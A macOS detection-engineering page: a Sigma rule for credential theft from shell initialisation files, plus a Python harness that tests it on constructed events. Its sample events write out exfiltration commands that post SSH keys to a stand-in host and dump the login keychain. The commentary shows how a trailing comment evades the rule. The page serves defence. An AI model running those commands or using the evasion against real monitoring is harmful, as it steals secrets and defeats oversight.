🍎 macOS

Potential Credential Exfiltration via Shell Configuration

Detects processes spawned from shell initialisation that access sensitive credential files. Attackers use .zshrc to automatically search for and exfiltrate SSH keys, AWS credentials, API tokens, keychain databases, and other sensitive authentication materials when a terminal is opened. This detection identifies suspicious file access patterns combined with credential-related commands.

Author: Chris S (avrgsec_)
Date: 2025-11-13
Level: CRITICAL
Status: experimental

Sigma Rule

title: Potential Credential Exfiltration via Shell Configuration
id: 4d5e6f7a-8b9c-0d1e-2f3a-4b5c6d7e8f9a
status: experimental
description: |
  Detects processes spawned from shell initialisation that access sensitive credential files.
  Attackers use .zshrc to automatically search for and exfiltrate SSH keys, AWS credentials,
  API tokens, keychain databases, and other sensitive authentication materials when a terminal 
  is opened. This detection identifies suspicious file access patterns combined with 
  credential-related commands.
references:
  - https://attack.mitre.org/techniques/T1552/001/
  - https://attack.mitre.org/techniques/T1552/004/
  - https://attack.mitre.org/techniques/T1555/001/
  - https://avrgsec.me/detections/macos/keychain_db_staging_for_exfiltration/
  - https://avrgsec.me/detections/macos/suspicious_keychain_access_via_security_utility/
author: Chris S (avrgsec_)
date: "2025-11-13"
tags:
  - attack.t1552.001
  - attack.credential_access
  - attack.t1552.004
  - attack.t1555.001
  - attack.t1041
  - attack.exfiltration
logsource:
  category: process_creation
  product: macos
detection:
  selection_parent:
    ParentImage|endswith:
      - '/zsh'
      - '/bash'
  selection_credential_access:
    CommandLine|contains:
      - '.ssh/id_rsa'
      - '.ssh/id_ed25519'
      - '.ssh/id_ecdsa'
      - '.aws/credentials'
      - 'PRIVATE KEY'
      - '.docker/config.json'
      - '.kube/config'
      - 'token'
      - 'secret'
      - '.npmrc'
      - '.pypirc'
      - '.gitconfig'
      - 'login.keychain'
      - 'login.keychain-db'
      - '/Keychains/'
      - 'security dump-keychain'
      - 'security find-generic-password'
      - 'security find-internet-password'
  selection_tools:
    Image|endswith:
      - '/find'
      - '/grep'
      - '/cat'
      - '/tar'
      - '/zip'
      - '/curl'
      - '/scp'
      - '/base64'
      - '/security'
  filter_legit:
    CommandLine|contains:
      - '/brew'
      - '/oh-my-zsh'
      - 'update_terminal'
  condition: selection_parent and selection_credential_access and selection_tools and not filter_legit
falsepositives:
  - Legitimate backup scripts run at shell initialization
  - SSH key management tools
  - Development environment setup that configures credentials
  - Password managers accessing keychain
level: critical

False Positives

  • Legitimate backup scripts run at shell initialization
  • SSH key management tools
  • Development environment setup that configures credentials
  • Password managers accessing keychain
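To see how the rule's four selections combine, and why two of the false positives above are structural rather than incidental, here is the condition re-implemented in Python and run over a handful of constructed process_creation events. This is an added example, not code from the detection page or its author; the events are invented for illustration (field names follow Sigma's process_creation taxonomy, paths and the https://example.invalid host are assumptions).

```python
"""Evaluate the Sigma rule's condition over constructed macOS
process_creation events.  Added example; not part of the original
detection.  All events below are constructed, not captured telemetry."""

# Values copied from the rule, lowercased because Sigma string matching
# is case-insensitive unless the 'cased' modifier is used.
PARENT_SUFFIXES = ("/zsh", "/bash")
CREDENTIAL_TERMS = (
    ".ssh/id_rsa", ".ssh/id_ed25519", ".ssh/id_ecdsa", ".aws/credentials",
    "private key", ".docker/config.json", ".kube/config", "token", "secret",
    ".npmrc", ".pypirc", ".gitconfig", "login.keychain", "login.keychain-db",
    "/keychains/", "security dump-keychain", "security find-generic-password",
    "security find-internet-password",
)
TOOL_SUFFIXES = ("/find", "/grep", "/cat", "/tar", "/zip", "/curl", "/scp",
                 "/base64", "/security")
LEGIT_TERMS = ("/brew", "/oh-my-zsh", "update_terminal")


def matches(event: dict) -> bool:
    """True when the event satisfies
    selection_parent and selection_credential_access and selection_tools
    and not filter_legit, exactly as the rule's condition reads."""
    parent = event.get("ParentImage", "").lower()
    image = event.get("Image", "").lower()
    cmd = event.get("CommandLine", "").lower()

    selection_parent = parent.endswith(PARENT_SUFFIXES)            # ParentImage|endswith
    selection_credential_access = any(t in cmd for t in CREDENTIAL_TERMS)  # CommandLine|contains
    selection_tools = image.endswith(TOOL_SUFFIXES)                 # Image|endswith
    filter_legit = any(t in cmd for t in LEGIT_TERMS)               # CommandLine|contains

    return (selection_parent and selection_credential_access
            and selection_tools and not filter_legit)


# Constructed sample events (hypothetical paths and host).
SAMPLE_EVENTS = [
    {   # a .zshrc one-liner that posts an SSH key off the host
        "name": "zshrc_exfil",
        "ParentImage": "/bin/zsh",
        "Image": "/usr/bin/curl",
        "CommandLine": "curl -s --data-binary @/Users/dev/.ssh/id_ed25519 "
                       "https://example.invalid/upload",
    },
    {   # dumping the login keychain with the security utility
        "name": "keychain_dump",
        "ParentImage": "/bin/zsh",
        "Image": "/usr/bin/security",
        "CommandLine": "security dump-keychain -d "
                       "/Users/dev/Library/Keychains/login.keychain-db",
    },
    {   # same read, but the parent is not a shell: selection_parent fails
        "name": "not_from_shell",
        "ParentImage": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal",
        "Image": "/usr/bin/cat",
        "CommandLine": "cat /Users/dev/.ssh/id_rsa",
    },
    {   # benign source grep: fires because 'token' is a bare substring
        "name": "benign_token_grep",
        "ParentImage": "/bin/zsh",
        "Image": "/usr/bin/grep",
        "CommandLine": "grep -rn tokenizer src/",
    },
    {   # the exfil command again with '/brew' appended as a comment:
        # filter_legit is attacker-controlled text, so the alert is suppressed
        "name": "evasion_via_filter",
        "ParentImage": "/bin/zsh",
        "Image": "/usr/bin/curl",
        "CommandLine": "curl -s --data-binary @/Users/dev/.ssh/id_rsa "
                       "https://example.invalid/upload # /brew",
    },
]


def evaluate_all(events=SAMPLE_EVENTS) -> dict:
    """Map each sample event's name to the rule verdict."""
    return {e["name"]: matches(e) for e in events}


if __name__ == "__main__":
    for name, hit in evaluate_all().items():
        print(f"{'ALERT ' if hit else 'ignore'}  {name}")
```

Three things the run makes concrete. The parent check only sees ParentImage, so a command typed interactively in an open shell is indistinguishable from one spawned by .zshrc; the rule is really "shell child touching credential material", and shell-init attribution has to come from the reviewer or from a richer source. The bare 'token' and 'secret' substrings match ordinary developer commands, which is where most of the listed false positives will come from; scoping them (for example to '.aws/credentials'-style paths or to 'security find-generic-password') cuts that noise without losing the keychain and SSH cases. And because filter_legit matches on CommandLine, anything an attacker can put into their own command line, such as a trailing comment containing '/brew', suppresses the alert; exclusions keyed on ParentImage or the process's own Image are harder to forge than substrings of the suspect command.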
